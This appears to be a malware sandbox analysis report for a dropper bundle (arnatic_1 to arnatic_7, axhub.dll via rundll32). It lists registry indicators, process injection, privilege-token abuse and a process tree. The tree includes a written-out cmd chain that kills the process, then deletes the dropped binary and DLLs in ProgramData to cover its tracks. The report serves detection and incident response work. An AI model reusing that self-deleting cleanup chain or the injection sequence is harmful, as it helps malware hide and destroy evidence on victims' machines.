Set value (str) | M\@tzres.dll,-81 = "Atlantic Daylight Time" | app.exe
Set value (str) | M\@tzres.dll,-172 = "Central Standard Time (Mexico)" | app.exe
Set value (str) | M\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | app.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\@tzres.dll,-491 = "India Daylight Time" | app.exe
Set value (str) | M\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | app.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\@tzres.dll,-1502 = "Turkey Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\@tzres.dll,-2512 = "Lord Howe Standard Time" | app.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\@tzres.dll,-2771 = "Omsk Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | app.exe
Set value (str) | M\@tzres.dll,-192 = "Mountain Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | app.exe
Set value (str) | M\@tzres.dll,-131 = "US Eastern Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | svchost.exe
Set value (str) | M\@tzres.dll,-91 = "Pacific SA Daylight Time" | app.exe
Set value (str) | M\@tzres.dll,-302 = "Romance Standard Time" | app.exe
Set value (str) | M\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | app.exe
Set value (str) | M\@tzres.dll,-732 = "Fiji Standard Time" | app.exe
Set value (str) | M\@tzres.dll,-2062 = "North Korea Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | app.exe
Set value (str) | M\@tzres.dll,-1722 = "Libya Standard Time" | app.exe
Set value (str) | M\@tzres.dll,-752 = "Tonga Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\@tzres.dll,-332 = "E. Europe Standard Time" | app.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\@tzres.dll,-2772 = "Omsk Standard Time" | app.exe
Set value (str) | M\@tzres.dll,-1501 = "Turkey Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | app.exe
Set value (str) | M\@tzres.dll,-1662 = "Bahia Standard Time" | app.exe
Set value (str) | M\@tzres.dll,-365 = "Middle East Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | cmd.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | cmd.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | app.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str) | M\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" | ypYDB0vdoDVBp7hsRzifyKGQ.exe
-
Modifies registry class 64 IoCs
Processes: MicrosoftEdge.exe (5), MicrosoftEdgeCP.exe (21), rUNdlL32.eXe, svchost.exe
Keys written as P\... are under P = \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe (the Edge AppContainer store); the two HKLM CLSID keys are shown in full.
description | ioc | process
Key deleted | P\Children\001\ACGLockdown\BlameModules | MicrosoftEdge.exe
Set value (int) | P\MicrosoftEdge\Privacy\InProgressFlags = "262144" | MicrosoftEdge.exe
Set value (int) | P\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\Total = "0" | MicrosoftEdgeCP.exe
Key created | P\MicrosoftEdge\HistoryJournalCertificate | MicrosoftEdgeCP.exe
Key created | P\Children\121\CIStatus | MicrosoftEdgeCP.exe
Set value (str) | P\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" |
Set value (str) | P\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdge.exe
Key created | P\MicrosoftEdge\Main | MicrosoftEdge.exe
Key created | P\Children\001\Internet Explorer\Main | MicrosoftEdgeCP.exe
Set value (int) | P\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\ = "959" | MicrosoftEdgeCP.exe
Set value (data) | P\CIStatus\CIStatusTimestamp = fc761b811773d701 | MicrosoftEdge.exe
Set value (int) | P\Children\001\Internet Explorer\Main\OperationalData = "1" | MicrosoftEdgeCP.exe
Key created | P\Children\001\ACGStatus | MicrosoftEdgeCP.exe
Set value (data) | P\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | MicrosoftEdgeCP.exe
Set value (int) | P\Children\001\ACGStatus\ACGPolicyState = "8" | MicrosoftEdgeCP.exe
Set value (data) | P\Children\121\CIStatus\SignaturePolicy = 06000000 | MicrosoftEdgeCP.exe
Key created | P\MicrosoftEdge\Internet Settings | MicrosoftEdge.exe
Set value (data) | P\Children\006\CIStatus\SignaturePolicy = 06000000 | MicrosoftEdgeCP.exe
Set value (int) | P\Children\121\Internet Settings\Cache\History\CacheLimit = "1" | MicrosoftEdgeCP.exe
Key created | P\Children\001\CIStatus | MicrosoftEdgeCP.exe
Set value (str) | P\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Key created | P\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions | MicrosoftEdge.exe
Set value (int) | P\Children\001\Internet Explorer\EdpDomStorage\acnav.online\Total = "0" | MicrosoftEdgeCP.exe
Set value (int) | P\MicrosoftEdge\GPU\VendorId = "0" |
Set value (int) | P\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "143" | MicrosoftEdgeCP.exe
Set value (int) | P\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "143" | MicrosoftEdgeCP.exe
Key created | P\Children\001\Internet Explorer\DOMStorage\Total | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K}\1 = "2302" | rUNdlL32.eXe
Set value (int) | P\MicrosoftEdge\GPU\VersionLow = "0" |
Set value (int) | P\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" | MicrosoftEdge.exe
Set value (int) | P\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" | MicrosoftEdge.exe
Set value (str) | P\Children\121\ACGLockdown\BlameModules\00000000 = "MicrosoftEdgeCP.exe\\wincorlib.DLL\\USER32.dll\\clipc.dll\\WINHTTP.dll\\CRYPTBASE.dll\\msiso.dll\\Windows.UI.dll\\usermgrcli.dll\\msctf.dll\\mrmcorer.dll\\UiaManager.dll\\Windows.Graphics.dll\\E" | MicrosoftEdgeCP.exe
Set value (str) | P\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Key created | P\Children\001\Internet Explorer\DOMStorage | MicrosoftEdgeCP.exe
Set value (int) | P\MicrosoftEdge\ServiceUI\IsSignedIn = "0" |
Key created | P\Children\121\Internet Settings\Cache\Content | MicrosoftEdgeCP.exe
Key created | P\Children\001\ACGStatus | MicrosoftEdgeCP.exe
Key created | P\MicrosoftEdge\DataStore |
Set value (int) | P\MicrosoftEdge\DummyPath\dummySetting = "1" | MicrosoftEdge.exe
Key created | P\Children\006\CIStatus | MicrosoftEdgeCP.exe
Key created | P\MicrosoftEdge | MicrosoftEdgeCP.exe
Set value (int) | P\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" | MicrosoftEdgeCP.exe
Set value (str) | P\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdge.exe
Set value (str) | P\Children\001\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdgeCP.exe
Set value (int) | P\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" | MicrosoftEdge.exe
Key created | P\Software\Microsoft\SystemCertificates | MicrosoftEdge.exe
Set value (data) | P\CIStatus\CIStatusTimestamp = b117224b1573d701 |
Set value (int) | P\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "0" | MicrosoftEdgeCP.exe
Set value (int) | P\Children\001\Internet Explorer\DOMStorage\Total\ = "190" | MicrosoftEdgeCP.exe
Set value (str) | P\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C\2 = "1" | svchost.exe
Key created | P\Children\001\ACGLockdown | MicrosoftEdgeCP.exe
Key created | P\MicrosoftEdge\TabbedBrowsing | MicrosoftEdgeCP.exe
Set value (int) | P\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "47" | MicrosoftEdgeCP.exe
Key created | P\MicrosoftEdge\TabbedBrowsing\NewTabPage | MicrosoftEdge.exe
Set value (data) | P\Children\121\ACGStatus\DynamicCodePolicy = 05000000 | MicrosoftEdgeCP.exe
Set value (data) | P\CIStatus\CIStatusTimestamp = 2c0397471573d701 |
Key created | P\Children\006\ACGStatus | MicrosoftEdgeCP.exe
Set value (int) | P\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "937" | MicrosoftEdgeCP.exe
Set value (int) | P\MicrosoftEdge\Extension
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
- HTTP User-Agent header | 621 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 622 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 623 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 629 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 630 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 631 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 455 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 461 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process (consecutive identical entries are collapsed with a count)
- 3172 | rUNdlL32.eXe (×2)
- 3900 | svchost.exe (×2)
- 1252 | arnatic_2.exe (×2)
- 4732 | jfiag3g_gg.exe (×2)
- 2164 | arnatic_1.exe (×6)
- 3144 | 3081054.exe (×2)
- 2164 | arnatic_1.exe (×2)
- 3876 | 1126656.exe (×2)
- 4176 | 5925079.exe (×2)
- 3876 | 1126656.exe
- 2756 | (no process name recorded) (×41)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
- 2756 | (no process name recorded)
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
pid | process (consecutive identical entries are collapsed with a count)
- 1252 | arnatic_2.exe
- 5480 | MrGh6bEH0L0a.exe
- 2756 | (no process name recorded) (×8)
- 5468 | explorer.exe (×4)
- 2756 | (no process name recorded) (×2)
- 5468 | explorer.exe (×4)
- 2756 | (no process name recorded) (×2)
- 2928 | explorer.exe (×2)
- 5468 | explorer.exe (×4)
- 2756 | (no process name recorded) (×2)
- 5468 | explorer.exe (×2)
- 2756 | (no process name recorded) (×2)
- 5468 | explorer.exe (×2)
- 5784 | explorer.exe (×2)
- 5468 | explorer.exe (×4)
- 2756 | (no process name recorded) (×2)
- 5468 | explorer.exe (×2)
- 5784 | explorer.exe (×18)
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
pid | process
- 5244 | 5145379.exe
- 6516 | 8933555.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process (consecutive identical entries are collapsed with a count)
- Token: SeDebugPrivilege | 1584 | arnatic_5.exe
- Token: SeDebugPrivilege | 3172 | rUNdlL32.eXe (×2)
- Token: SeDebugPrivilege | 3900 | svchost.exe
- Token: SeDebugPrivilege | 3172 | rUNdlL32.eXe (×11)
- Token: SeDebugPrivilege | 3876 | 1126656.exe
- Token: SeDebugPrivilege | 4176 | 5925079.exe
- Token: SeDebugPrivilege | 208 | arnatic_7.exe
The following twelve entries for pid 2776 (svchost.exe) then repeat, in this order, three full times:
- Token: SeAssignPrimaryTokenPrivilege | 2776 | svchost.exe
- Token: SeIncreaseQuotaPrivilege | 2776 | svchost.exe
- Token: SeSecurityPrivilege | 2776 | svchost.exe
- Token: SeTakeOwnershipPrivilege | 2776 | svchost.exe
- Token: SeLoadDriverPrivilege | 2776 | svchost.exe
- Token: SeSystemtimePrivilege | 2776 | svchost.exe
- Token: SeBackupPrivilege | 2776 | svchost.exe
- Token: SeRestorePrivilege | 2776 | svchost.exe
- Token: SeShutdownPrivilege | 2776 | svchost.exe
- Token: SeSystemEnvironmentPrivilege | 2776 | svchost.exe
- Token: SeUndockPrivilege | 2776 | svchost.exe
- Token: SeManageVolumePrivilege | 2776 | svchost.exe
A fourth, partial pass follows with the first ten of these (SeAssignPrimaryTokenPrivilege through SeSystemEnvironmentPrivilege), again for 2776 svchost.exe.
Suspicious use of FindShellTrayWindow 33 IoCs
Processes:
pid | process (consecutive identical entries are collapsed with a count)
- 2756 | (no process name recorded) (×2)
- 8 | chrome.exe (×2)
- 2756 | (no process name recorded) (×8)
- 5492 | irecord.tmp
- 6780 | Setup3310.tmp
- 2756 | (no process name recorded) (×2)
- 7556 | prolab.tmp
- 7504 | ultramediaburner.tmp
- 744 | Setup3310.tmp
- 7748 | Setup3310.tmp
- 8196 | Setup3310.tmp
- 5168 | libravpn_setup.tmp
- 6796 | LibraVPN.exe
- 2756 | (no process name recorded) (×10)
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
pid | process
- 2756 | (no process name recorded) (×3)
- 6796 | LibraVPN.exe
Suspicious use of SetWindowsHookEx 28 IoCs
Processes:
pid | process (consecutive identical entries are collapsed with a count)
- 3876 | Browzar.exe (×7)
- 2756 | (no process name recorded)
- 5444 | (no process name recorded)
- 6520 | MicrosoftEdgeCP.exe (×2)
- 8644 | MicrosoftEdge.exe
- 6584 | MicrosoftEdgeCP.exe (×2)
- 6796 | LibraVPN.exe (×2)
- 8568 | MicrosoftEdge.exe
- 6580 | MicrosoftEdgeCP.exe (×2)
- 5184 | MicrosoftEdge.exe
- 9120 | MicrosoftEdgeCP.exe (×2)
- 9032 | MicrosoftEdge.exe
- 2844 | MicrosoftEdgeCP.exe (×2)
- 3684 | MicrosoftEdge.exe
- 5924 | MicrosoftEdgeCP.exe (×2)
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
- 2756 | (no process name recorded)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process (consecutive identical entries are collapsed with a count)
- PID 3540 wrote to memory of 1580 | 3540 | setup_x86_x64_install - копия (20).exe | setup_installer.exe (×3)
- PID 1580 wrote to memory of 3672 | 1580 | setup_installer.exe | setup_install.exe (×3)
- PID 3672 wrote to memory of 1548 | 3672 | setup_install.exe | cmd.exe (×3)
- PID 3672 wrote to memory of 4068 | 3672 | setup_install.exe | cmd.exe (×3)
- PID 3672 wrote to memory of 3104 | 3672 | setup_install.exe | cmd.exe (×3)
- PID 3672 wrote to memory of 3004 | 3672 | setup_install.exe | cmd.exe (×3)
- PID 3672 wrote to memory of 3092 | 3672 | setup_install.exe | cmd.exe (×3)
- PID 3672 wrote to memory of 2720 | 3672 | setup_install.exe | cmd.exe (×3)
- PID 3672 wrote to memory of 3368 | 3672 | setup_install.exe | cmd.exe (×3)
- PID 4068 wrote to memory of 1252 | 4068 | cmd.exe | arnatic_2.exe (×3)
- PID 3104 wrote to memory of 1128 | 3104 | cmd.exe | arnatic_3.exe (×3)
- PID 2720 wrote to memory of 3712 | 2720 | cmd.exe | arnatic_6.exe (×3)
- PID 1548 wrote to memory of 2164 | 1548 | cmd.exe | arnatic_1.exe (×3)
- PID 3092 wrote to memory of 1584 | 3092 | cmd.exe | arnatic_5.exe (×2)
- PID 3004 wrote to memory of 3788 | 3004 | cmd.exe | arnatic_4.exe (×3)
- PID 3368 wrote to memory of 3804 | 3368 | cmd.exe | arnatic_7.exe (×3)
- PID 3804 wrote to memory of 208 | 3804 | arnatic_7.exe | arnatic_7.exe (×3)
- PID 3788 wrote to memory of 3144 | 3788 | arnatic_4.exe | 3081054.exe (×3)
- PID 1128 wrote to memory of 3172 | 1128 | arnatic_3.exe | rUNdlL32.eXe (×3)
- PID 3172 wrote to memory of 3900 | 3172 | rUNdlL32.eXe | svchost.exe
- PID 3804 wrote to memory of 208 | 3804 | arnatic_7.exe | arnatic_7.exe (×5)
- PID 3172 wrote to memory of 2672 | 3172 | rUNdlL32.eXe | svchost.exe
- PID 3900 wrote to memory of 3872 | 3900 | svchost.exe | svchost.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Roaming\rsrbfsfC:\Users\Admin\AppData\Roaming\rsrbfsf2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf2⤵
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf3⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\jdrbfsfC:\Users\Admin\AppData\Roaming\jdrbfsf2⤵
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Roaming\rsrbfsfC:\Users\Admin\AppData\Roaming\rsrbfsf2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf3⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\jdrbfsfC:\Users\Admin\AppData\Roaming\jdrbfsf2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll",QRIvBFx2⤵
- Windows security modification
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Roaming\rsrbfsfC:\Users\Admin\AppData\Roaming\rsrbfsf2⤵
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf2⤵
-
C:\Users\Admin\AppData\Roaming\jdrbfsfC:\Users\Admin\AppData\Roaming\jdrbfsf2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_1.exearnatic_1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_1.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im arnatic_1.exe /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_2.exearnatic_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_3.exearnatic_3.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
